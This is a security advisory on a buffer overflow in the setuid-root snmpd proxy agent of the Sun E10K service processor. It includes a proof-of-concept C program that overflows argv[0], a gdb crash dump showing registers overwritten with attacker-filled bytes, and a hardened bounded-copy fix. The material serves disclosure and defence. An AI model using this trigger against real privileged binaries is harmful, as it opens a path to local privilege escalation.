Vulnerability: snmpd
Affected: Solaris 8

Description

Pablo Sor found the following. The /opt/SUNWssp/snmpd command (SNMP proxy agent) is setuid root and contains a buffer overflow: it copies its own name (argv[0]) into an internal variable without checking its length, so an overlong name overflows that variable.

Demonstration program (the original proof of concept, with the missing includes added, main's return type corrected and an argument check so it does not crash on its own when run without a length):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        int len = (argc > 1) ? atoi(argv[1]) : 0;
        char *buf;
        if (len < 2) return 1;                 /* need room for at least one byte plus NUL */
        buf = (char *) malloc(len * sizeof(char));
        memset(buf, 0x41, len - 1);            /* fill the name with 'A' (0x41) */
        buf[len - 1] = 0;
        /* start snmpd with the oversized string as its argv[0] */
        execl("/opt/SUNWssp/bin/snmpd", buf, (char *) 0);
        return 1;                              /* only reached if execl fails */
    }

-----------------------------------------------------

    $ uname -a
    SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
    $ ./snmpd-demo 700
    Segmentation Fault (core dumped)
    $ gdb ./snmpd-demo --core=core
    [..]
    Program received signal SIGSEGV, Segmentation fault.
    0xfee32b58 in strcpy () from /usr/lib/libc.so.1
    (gdb) info registers
    g0    0x0         0
    g1    0x78000     491520
    g2    0xff22579c  -14526564
    g3    0xff162d78  -15323784
    g4    0x0         0
    g5    0x0         0
    g6    0x0         0
    g7    0x76f98     487320
    o0    0x2c1       705
    o1    0xffbed9b9  -4269639
    o2    0x2c1       705
    o3    0x41        65
    o4    0xffbed180  -4271744
    o5    0xff26a147  -14245561
    sp    0xffbed658  -4270504
    o7    0xfee83650  -18336176
    l0    0x7efefeff  2130640639
    l1    0x81010100  -2130640640
    l2    0xff000000  -16777216
    l3    0xff0000    16711680
    l4    0xff00      65280
    l5    0x0         0
    l6    0x0         0
    l7    0x0         0
    i0    0x41414141  1094795585   ;;;;;
    i1    0xffbed6fc  -4270340     ; pointer to argv[0]
    i2    0x41414141  1094795585   ;;;;;
    i3    0x41414141  1094795585   ;;;;;
    i4    0x81010100  -2130640640
    i5    0xff00      65280
    fp    0xffbed698  -4270440
    i7    0xff265474  -14265228
    y     0x6         6
    psr   0xfe001000  -33550336
    wim   0x0         0
    tbr   0x0         0
    pc    0xfee32b58  -18666664
    npc   0xfee32b5c  -18666660
    fpsr  0x0         0
    cpsr  0x0         0
    (gdb) x/20x $i1
    0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141

Solution

Just for clarification: this binary is NOT part of Solaris 8. It is part of the SUNWsspop package, which is only installed on the SSP (System Service Processor) machine of an Enterprise 10,000 (aka Starfire) system. This package is not part of a standard install; it would only be loaded on the SSP of an E10K, which, if recommended practice is followed, sits on a controlled admin network and only allows access to the users ssp and root, and perhaps application IDs such as patrol. The reason it is setuid is that it is normally started by the user ssp and needs to access privileged ports. Sun logged a bug (Id: 4425460), so the problem will be fixed in future releases.
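The fix for the class of bug described above is a bounded copy that rejects an argv[0] that does not fit the internal buffer. The following is an added example written for this page, not Sun's code; the buffer size PROGNAME_MAX is a placeholder, since the advisory does not state the real one, and the test name is built of 'A' bytes the same way the demo program builds its argv[0].

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the agent's internal name buffer; the real value inside
   snmpd is not given in the advisory, so 64 is a placeholder. */
#define PROGNAME_MAX 64

/* Hardened replacement for an unchecked strcpy(dst, argv[0]).
   argv[0] is chosen by whoever exec()s the program, so it is untrusted input.
   Returns 0 on success, -1 when argv0 is missing or does not fit in dst. */
static int save_progname(char *dst, size_t dstsz, const char *argv0)
{
    const char *end;
    if (argv0 == NULL || dstsz == 0)
        return -1;
    /* Look for the terminator within dstsz bytes only; never scan further. */
    end = memchr(argv0, '\0', dstsz);
    if (end == NULL) {            /* no NUL within the buffer size: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, argv0, (size_t)(end - argv0) + 1);   /* includes the NUL */
    return 0;
}

/* Feed the hardened copy a constructed name of 'len' 'A' bytes and report
   its result, so the boundary behaviour can be checked without exec(). */
static int try_name_of_length(size_t len)
{
    char name[1024];
    char progname[PROGNAME_MAX];
    if (len >= sizeof name)
        len = sizeof name - 1;
    memset(name, 'A', len);
    name[len] = '\0';
    return save_progname(progname, sizeof progname, name);
}

int main(int argc, char **argv)
{
    char progname[PROGNAME_MAX];
    (void)argc;
    if (save_progname(progname, sizeof progname, argv[0]) != 0) {
        fprintf(stderr, "program name too long, refusing to start\n");
        return 1;
    }
    printf("running as %s\n", progname);
    return 0;
}
```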